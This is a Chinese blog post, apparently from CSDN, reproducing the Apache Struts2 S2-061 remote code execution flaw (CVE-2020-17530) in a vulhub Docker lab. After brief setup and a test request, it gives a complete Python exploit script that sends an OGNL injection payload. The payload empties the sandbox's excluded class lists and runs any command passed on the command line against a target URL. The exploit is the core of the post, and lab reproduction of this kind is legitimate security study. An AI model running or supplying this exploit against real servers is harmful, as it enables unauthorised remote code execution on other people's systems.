Struts2-061漏洞复现

最新推荐文章于 2024-03-21 12:03:46 发布
最新推荐文章于 2024-03-21 12:03:46 发布
阅读量228 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46804551/article/details/115500394
版权

搭建

https://github.com/vulhub/vulhub/tree/master/struts2/s2-061
拉取镜像启动环境:

docker-compose up -d
在这里插入图片描述
成功访问

http://your-ip:8080

在这里插入图片描述

复现

Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。

首先验证漏洞是否存在

http://192.168.204.131:8080/?id=%25%7b+%27test%27+%2b+(2000+%2b+20).toString()%7d

在这里插入图片描述
POC:


# encoding=utf-8
import requests
import sys
from lxml import etree
 
 
def exp(url,cmd):
    payload="%25%7b(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d%7b%27"+cmd+"%27%7d).(%23res%3d%23exec.exec(%23cmd))%7d"
    tturl=url+"/?id="+payload
    r=requests.get(tturl)
    page=r.text
#   etree=html.etree
    page=etree.HTML(page)
    data = page.xpath('//a[@id]/@id')
    print(data[0])
 
if __name__=='__main__':
    print('+------------------------------------------------------------+')
    print('+ EXP: python struts2-061-poc.py http://1.1.1.1:8081 id      +')
    print('+ VER: Struts 2.0.0-2.5.25                                   +')
    print('+------------------------------------------------------------+')
    print('+ S2-061 RCE && CVE-2020-17530                               +')
    print('+------------------------------------------------------------+')
    if len(sys.argv)!=3:
        print("[+]ussage: http://ip:port command")
        print("[+]============================================================")
        sys.exit()
    url=sys.argv[1]
    cmd=sys.argv[2]
exp(url,cmd)

在这里插入图片描述
成功执行命令
参考:https://blog.csdn.net/xuandao_ahfengren/article/details/111052971

. iDea.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(CVE-2020-17530)Struts2 S2-061 远程命令执行漏洞复现
ximo的博客
04-02 392
简介 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 漏洞概述 S2-061是对S2-059的绕过,Struts2官方对S2-059的修复方式是加强OGNL表达式沙盒,而S2-061绕过了该沙盒。 影响版本 Struts 2.0.0-Struts 2.5.25 环境搭建 使用vulhub+docker环境,进入漏洞目录,启动: /vulhub/vulhub-maste
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)复现
m0_69801663的博客
12-23 651
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)复现
Struts2 S2-061(CVE-2020-17530)漏洞复现
kukudeshuo的博客
01-21 5768
Struts2 S2-061(CVE-2020-17530)漏洞复现 漏洞简介 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。 漏洞描述 Struts2 会对某些标签属性(比如 id,其他属性有待寻找) 的属性值进行二次表达式解析,因此当这些标签属性
struts2/s2-061(vulhub复现)
qq_40646572的博客
10-31 955
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。S2-061是对S2-059沙盒进行的绕过。
CVE-2020-17530 Struts2-061远程代码执行漏洞
weixin_45715461的博客
07-01 1910
CVE-2020-17530 Struts2-061远程代码执行漏洞
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
struts-2.5.16-源码+示例(S2-057漏洞演示环境)
08-24
S2-057漏洞,全称为"Struts2 OGNL注入漏洞",主要源于Struts 2框架处理用户输入时的不当验证和处理。OGNL (Object-Graph Navigation Language) 是一种强大的表达式语言,用于获取和设置Java对象的属性。在Struts 2中...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
Struts2 最新漏洞 S2-016、S2-017 修补方案 Struts2 是一个基于 Java 的 Web 应用程序框架,由 Apache 软件基金会维护。最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
然而,就像任何其他复杂的软件系统一样,Struts2也存在安全漏洞。其中,S2-045 和 CVE-2017-5638 是一个极其严重的问题,可能导致远程代码执行(RCE),进而让攻击者完全控制受影响的服务器。 S2-045 漏洞,官方...
漏洞复现】6.Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)复现与分析
最新发布
Zichel77的博客
03-21 1350
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)漏洞复现
sechelper的博客
01-11 614
cve漏洞详细复现漏洞利用,反弹shell,工具分享
Struts2 S2-061 远程命令执行漏洞复现
weixin_44576411的博客
12-21 1683
** Struts2 S2-061 远程命令执行漏洞复现 ** 1. 概述 s2-061 是一个远程命令执行的漏洞Struts2 会对某些标签属性(比如 id,其他属性有待寻找) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时,用户再传入一个 %{payload} 即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕过。 所以在对漏洞进行绕过时,可以考虑从id入手,这里主要讲怎么复现这个漏洞。 2. 复现 1.用到的工具:pocsuite vulh
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)
chaojixiaojingang
12-15 2040
1.漏洞简介 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行。 2.影响版本 Apache Struts 2.0.0 - 2.5.25 3.环境搭建 1)使用docker安装 项目地址: https://github.com/vul...
(CVE-2020-17530)Struts2 S2-061 远程命令执行漏洞复现
thelostworld
12-11 585
​ 最近一直关注Struts2 S2-061漏洞,最近忙今天才有空来复现一下这个漏洞Struts2 S2-061 远程命令执行漏洞复现 一、漏洞简介 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。 二、影响版本  Apache S
CVE-2020-17530: Apache Struts2 远程代码执行漏洞通告
爱国小白帽
12-08 8563
报告编号:B6-2020-120801 报告来源:360CERT 报告作者:360CERT 更新日期:2020-12-08 0x01 漏洞简述 2020年12月08日,360CERT监测发现 struts2 发布了 struts2 代码执行漏洞 的风险通告,该漏洞编号为 CVE-2020-17530 ,漏洞等级:高危 ,漏洞评分:7.5 。 在特定的环境下,远程攻击者通过构造 恶意的OGNL表达式 ,可造成 任意代码执行 。 对此,360CERT建议广大用户及时将 struts2 升级到最新版.
s2-005漏洞复现
10-05
s2-005漏洞是指在Struts2框架中存在的一个安全漏洞。该漏洞的原理是Struts2会将HTTP请求中的每个参数名解析为...关于具体的漏洞复现步骤和细节,请参考相关资源和教程。由于时间和篇幅的限制,无法提供完整的复现过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值